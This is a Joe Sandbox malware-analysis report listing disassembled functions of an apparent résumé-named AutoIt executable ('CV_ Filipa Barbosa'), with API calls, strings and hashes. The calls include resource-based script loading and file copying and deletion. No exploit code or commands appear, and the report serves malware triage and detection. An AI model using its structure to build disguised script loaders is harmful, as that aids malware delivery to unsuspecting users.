Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: 6e7d60cf12e7c5dd7e440b0b7e30f746a7c86a73a8f078cb06e9a7698c7cfeff
Instruction ID: a46ae0b062e73444e8c1edaa8bd8ba85ba6d81966f9a67b606c188152266c583
Opcode Fuzzy Hash: 6e7d60cf12e7c5dd7e440b0b7e30f746a7c86a73a8f078cb06e9a7698c7cfeff
Instruction Fuzzy Hash: 5961A67180A384DFCF17CFA894D15EABFB46F29300F1A89D9D8859F24BC624C949CB65

Function 002F406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,002F449E,?,?,00000000,00000001), ref: 002F407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,002F449E,?,?,00000000,00000001), ref: 002F4092
LoadResource.KERNEL32(?,00000000,?,?,002F449E,?,?,00000000,00000001,?,?,?,?,?,?,002F41FB), ref: 00364F1A
SizeofResource.KERNEL32(?,00000000,?,?,002F449E,?,?,00000000,00000001,?,?,?,?,?,?,002F41FB), ref: 00364F2F
LockResource.KERNEL32(002F449E,?,?,002F449E,?,?,00000000,00000001,?,?,?,?,?,?,002F41FB,00000000), ref: 00364F42

Strings

SCRIPT, xrefs: 002F4088

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: f59983e83b861c4853092941d6a54c2cfa27ed2956cd56c22d4f9cbc5f0f2cd1
Instruction ID: f27f11e530d73291b5cfd8acd5d8207bd5036766fedd0121030f22d17b07ba14
Opcode Fuzzy Hash: f59983e83b861c4853092941d6a54c2cfa27ed2956cd56c22d4f9cbc5f0f2cd1
Instruction Fuzzy Hash: D5115E70200706BFE7369B25DC48F27BBBDEFC5B51F10452DF60696250DAB1DC419A20

Function 00303B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON

Download Yara Rule

Strings

;, xrefs: 0036701F
;, xrefs: 003040A4
@, xrefs: 00304176
;, xrefs: 003040EC

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: @$ ;$ ;$ ;
API String ID: 3728558374-510597404
Opcode ID: ec086f223bf7b8a4ef6bbf26792d366230f7b5418561176aa59bac9b847e3ad8
Instruction ID: f098cec0a115ff44ed5ce5b6b7a0d53992c0360b08868dea3f4f22485cbb6c08
Opcode Fuzzy Hash: ec086f223bf7b8a4ef6bbf26792d366230f7b5418561176aa59bac9b847e3ad8
Instruction Fuzzy Hash: 7472DE74E05209DFCF16EF94C4A1ABEB7B9EF48304F15C06AE905AB291D730AE45CB91

Function 00336CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00362F49), ref: 00336CB9
FindFirstFileW.KERNELBASE(?,?), ref: 00336CCA
FindClose.KERNEL32(00000000), ref: 00336CDA

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 3e465625fbea654560956099e789e86c3d149136a063889715c2c973a93cd6d1
Instruction ID: 1cc403d7484d6ef093e82949b9124012eef03256f263744e280b0e6c8d64fea4
Opcode Fuzzy Hash: 3e465625fbea654560956099e789e86c3d149136a063889715c2c973a93cd6d1
Instruction Fuzzy Hash: 78E04831815515AB82216738EC4E8E9777CDE0533AF504715F575C11E0E770D94486E5

Function 00303200 Relevance: 2.2, Strings: 1, Instructions: 986COMMON

Download Yara Rule

Strings

;, xrefs: 0036933E

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: BuffCharUpper
String ID: ;
API String ID: 3964851224-3233700122
Opcode ID: abef8bd83c3d06ffdc71d05666296fb6245434273d65699e17781ba4a99059ae
Instruction ID: aefd7f32a5dfb4d925edbbcf23314370a54381b561b1d7668bece9fba07846ab
Opcode Fuzzy Hash: abef8bd83c3d06ffdc71d05666296fb6245434273d65699e17781ba4a99059ae
Instruction Fuzzy Hash: F8929D70609301CFD726DF18C4A0B6AB7E9BF85308F15885DE98A8B7A2C771ED45CB52

Function 002FE8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002FE959
timeGetTime.WINMM ref: 002FEBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002FED2E
TranslateMessage.USER32(?), ref: 002FED3F
DispatchMessageW.USER32(?), ref: 002FED4A
LockWindowUpdate.USER32(00000000), ref: 002FED79
DestroyWindow.USER32 ref: 002FED85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002FED9F
Sleep.KERNEL32(0000000A), ref: 00365270
TranslateMessage.USER32(?), ref: 003659F7
DispatchMessageW.USER32(?), ref: 00365A05
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00365A19

Strings

@GUI_WINHANDLE, xrefs: 00365360
@GUI_CTRLHANDLE, xrefs: 003653AC
@GUI_CTRLID, xrefs: 00365314
@TRAY_ID, xrefs: 003654C9

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: 1b9bab81a11bec3233efabebd48cc28c0eb18b24d54949bc7c21bdf57bce0c1e
Instruction ID: 33183806c46a4ff60ab6222333fcfa68030d842b9cdf84d0492f8a391b3614df
Opcode Fuzzy Hash: 1b9bab81a11bec3233efabebd48cc28c0eb18b24d54949bc7c21bdf57bce0c1e
Instruction Fuzzy Hash: 3262D370114344CFDB26DF24C895BBAB7E8BF44344F15497DFA468B2A6DBB09848CB52

Function 00325C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 00325EC3
___createFile.LIBCMT ref: 00325F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00325F2D
__dosmaperr.LIBCMT ref: 00325F34
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00325F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00325F6A
__dosmaperr.LIBCMT ref: 00325F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00325F7C
__set_osfhnd.LIBCMT ref: 00325FAC
__lseeki64_nolock.LIBCMT ref: 00326016
__close_nolock.LIBCMT ref: 0032603C
__chsize_nolock.LIBCMT ref: 0032606C
__lseeki64_nolock.LIBCMT ref: 0032607E
__lseeki64_nolock.LIBCMT ref: 00326176
__lseeki64_nolock.LIBCMT ref: 0032618B
__close_nolock.LIBCMT ref: 003261EB

Part of subcall function 0031EA9C: CloseHandle.KERNELBASE(00000000,0039EEF4,00000000,?,00326041,0039EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0031EAEC
Part of subcall function 0031EA9C: GetLastError.KERNEL32(?,00326041,0039EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0031EAF6
Part of subcall function 0031EA9C: __free_osfhnd.LIBCMT ref: 0031EB03
Part of subcall function 0031EA9C: __dosmaperr.LIBCMT ref: 0031EB25

Part of subcall function 00317C0E: __getptd_noexit.LIBCMT ref: 00317C0E

__lseeki64_nolock.LIBCMT ref: 0032620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00326342
___createFile.LIBCMT ref: 00326361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0032636E
__dosmaperr.LIBCMT ref: 00326375
__free_osfhnd.LIBCMT ref: 00326395
__invoke_watson.LIBCMT ref: 003263C3
__wsopen_helper.LIBCMT ref: 003263DD

Strings

@, xrefs: 00325F98

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: f888d6a537f924a4f7e096b3df6c35851e3ccc3d7f77be3625fedafdc3e90212
Instruction ID: 709bda5e8d659d5c7446cd2974a6df3013bd080039a5e1ada5f80bb8fc5dee19
Opcode Fuzzy Hash: f888d6a537f924a4f7e096b3df6c35851e3ccc3d7f77be3625fedafdc3e90212
Instruction Fuzzy Hash: 1D2246719046259FEB2B9F68EC46BFD7B75EF04314F294228E9119B2E1C3358E90C791

Function 0033FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 0033FA96
_wcschr.LIBCMT ref: 0033FAA4
_wcscpy.LIBCMT ref: 0033FABB
_wcscat.LIBCMT ref: 0033FACA
_wcscat.LIBCMT ref: 0033FAE8
_wcscpy.LIBCMT ref: 0033FB09
__wsplitpath.LIBCMT ref: 0033FBE6
_wcscpy.LIBCMT ref: 0033FC0B
_wcscpy.LIBCMT ref: 0033FC1D
_wcscpy.LIBCMT ref: 0033FC32
_wcscat.LIBCMT ref: 0033FC47
_wcscat.LIBCMT ref: 0033FC59
_wcscat.LIBCMT ref: 0033FC6E

Part of subcall function 0033BFA4: _wcscmp.LIBCMT ref: 0033C03E
Part of subcall function 0033BFA4: __wsplitpath.LIBCMT ref: 0033C083
Part of subcall function 0033BFA4: _wcscpy.LIBCMT ref: 0033C096
Part of subcall function 0033BFA4: _wcscat.LIBCMT ref: 0033C0A9
Part of subcall function 0033BFA4: __wsplitpath.LIBCMT ref: 0033C0CE
Part of subcall function 0033BFA4: _wcscat.LIBCMT ref: 0033C0E4
Part of subcall function 0033BFA4: _wcscat.LIBCMT ref: 0033C0F7

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0033FA61
t2:, xrefs: 0033FC97

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<$t2:
API String ID: 2955681530-1248104283
Opcode ID: 4bc248c0fe6b3a31712a865ba503ed05e3d0c85f2ce24d990f49a0e85401b432
Instruction ID: e52f4838274de86186e050a5b2e24aa947953dd576e199428074f529da670174
Opcode Fuzzy Hash: 4bc248c0fe6b3a31712a865ba503ed05e3d0c85f2ce24d990f49a0e85401b432
Instruction Fuzzy Hash: 9291B571504305AFDB16EB50C891FABF3E8BF48310F004969F9599B291DB70EA94CF91

Function 002F3F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 002F3F86
RegisterClassExW.USER32(00000030), ref: 002F3FB0
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002F3FC1
InitCommonControlsEx.COMCTL32(?), ref: 002F3FDE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002F3FEE
LoadIconW.USER32(000000A9), ref: 002F4004
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002F4013

Strings

0, xrefs: 002F3F68
+, xrefs: 002F3F6F
AutoIt v3 GUI, xrefs: 002F3FA2
TaskbarCreated, xrefs: 002F3FB6

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 80e825a91f84252416887ab777ca69b199691ec3aef0c71968adccb0066bf7b5
Instruction ID: e0d9071c98a3f4a67bbd9cf365c3aeba73a4e1e8bb352d305917af38281c1d2c
Opcode Fuzzy Hash: 80e825a91f84252416887ab777ca69b199691ec3aef0c71968adccb0066bf7b5
Instruction Fuzzy Hash: D921DBB5D00318AFDB12DFA4EC99BCDBBB8FB08704F50421AFA15A62A0D7B54584CF91

Function 0033BFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0033BDB4: __time64.LIBCMT ref: 0033BDBE

Part of subcall function 002F4517: _fseek.LIBCMT ref: 002F452F

__wsplitpath.LIBCMT ref: 0033C083

Part of subcall function 00311DFC: __wsplitpath_helper.LIBCMT ref: 00311E3C

_wcscpy.LIBCMT ref: 0033C096
_wcscat.LIBCMT ref: 0033C0A9
__wsplitpath.LIBCMT ref: 0033C0CE
_wcscat.LIBCMT ref: 0033C0E4
_wcscat.LIBCMT ref: 0033C0F7
_wcscmp.LIBCMT ref: 0033C03E

Part of subcall function 0033C56D: _wcscmp.LIBCMT ref: 0033C65D
Part of subcall function 0033C56D: _wcscmp.LIBCMT ref: 0033C670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0033C2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0033C338
CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0033C34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0033C35F
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0033C371

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID:
API String ID: 2378138488-0
Opcode ID: 4acf2711cb321192ccee1331586644cbf23c1affa9f4fe63b8af4edd57137903
Instruction ID: f6118a809236f57c6e8250fc8c430ec6f5bdc764c3202a2d8c5e3a424fab7c3b
Opcode Fuzzy Hash: 4acf2711cb321192ccee1331586644cbf23c1affa9f4fe63b8af4edd57137903
Instruction Fuzzy Hash: 91C12AB1E10219ABDF26DF95CC81EEEB7BDAF49310F0040A6F609F6151DB709A948F61

Function 002F3742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 002F37B3
KillTimer.USER32(?,00000001), ref: 002F37DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002F3800
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002F380B
CreatePopupMenu.USER32 ref: 002F381F
PostQuitMessage.USER32(00000000), ref: 002F382E

Strings

TaskbarCreated, xrefs: 002F3806

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 83bb0c6cc7f8e5d2f3517568301d145a2dfbc79126bb018e97f1a84e51477200
Instruction ID: efaebb343a9fe296ae9b3e4ecf67609dee918e8464bfc2dd92fe25785b31926c
Opcode Fuzzy Hash: 83bb0c6cc7f8e5d2f3517568301d145a2dfbc79126bb018e97f1a84e51477200
Instruction Fuzzy Hash: 3D4127F513414EA7DB22FF28DC5ABBAB669FB00384F540235FB02D61A0CAA09D609761

Function 002F3E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 002F3E79
LoadCursorW.USER32(00000000,00007F00), ref: 002F3E88
LoadIconW.USER32(00000063), ref: 002F3E9E
LoadIconW.USER32(000000A4), ref: 002F3EB0
LoadIconW.USER32(000000A2), ref: 002F3EC2

Part of subcall function 002F4024: LoadImageW.USER32(002F0000,00000063,00000001,00000010,00000010,00000000), ref: 002F4048

RegisterClassExW.USER32(?), ref: 002F3F30

Part of subcall function 002F3F53: GetSysColorBrush.USER32(0000000F), ref: 002F3F86
Part of subcall function 002F3F53: RegisterClassExW.USER32(00000030), ref: 002F3FB0
Part of subcall function 002F3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002F3FC1
Part of subcall function 002F3F53: InitCommonControlsEx.COMCTL32(?), ref: 002F3FDE
Part of subcall function 002F3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002F3FEE
Part of subcall function 002F3F53: LoadIconW.USER32(000000A9), ref: 002F4004
Part of subcall function 002F3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002F4013

Strings

AutoIt v3, xrefs: 002F3F1F
0, xrefs: 002F3F02
#, xrefs: 002F3F09

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 21ebc7b5ee1346a40f421eecca39a2daa95c3a0092865f380ad27275fed9f731
Instruction ID: 89cf1c6f06e87542ceb275e227592e42b25b222ddea6e0bfd0260a9698403657
Opcode Fuzzy Hash: 21ebc7b5ee1346a40f421eecca39a2daa95c3a0092865f380ad27275fed9f731
Instruction Fuzzy Hash: 2D2165B0E04304ABCB56DFA9EC55A9ABFF9FB48318F50422AE704A32A0D77546508F91

Function 01375D20 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01375DF1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01376017

Memory Dump Source

Source File: 00000000.00000002.1771378123.0000000001373000.00000040.00000020.00020000.00000000.sdmp, Offset: 01373000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1373000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction ID: 3e216f1ed7354e5279ba6cb149b7db42e02d97d395a3ffe158989cb4b0cf09b4
Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction Fuzzy Hash: 6FA11D70E04209EBDB28CFA4C954BEEBBB5FF48309F208559E505BB280D7799A45CF94

Function 002F49FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 002F4A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003641DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0036421A
RegCloseKey.ADVAPI32(?), ref: 00364249

Strings

Include, xrefs: 003641D3, 00364212
Software\AutoIt v3\AutoIt, xrefs: 002F4A13

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: 5aa7c4228f1371dd928200581462aa278c85c416a8ff08eeb45df572388eabab
Instruction ID: f6b93bb6d0e3927c334147d5c688687e5cf2ec8f8bbbb1f5d37d57259e288187
Opcode Fuzzy Hash: 5aa7c4228f1371dd928200581462aa278c85c416a8ff08eeb45df572388eabab
Instruction Fuzzy Hash: 73116D71A10208BEEB11ABA4DD96DFFBBBCEF04344F105069F506E6191EA70AE419B50

Function 002F36B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002F36E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002F3707
ShowWindow.USER32(00000000,?,?,?,?,002F3AA3,?), ref: 002F371B
ShowWindow.USER32(00000000,?,?,?,?,002F3AA3,?), ref: 002F3724

Strings

AutoIt v3, xrefs: 002F36DE, 002F36E3, 002F36E4
edit, xrefs: 002F3701

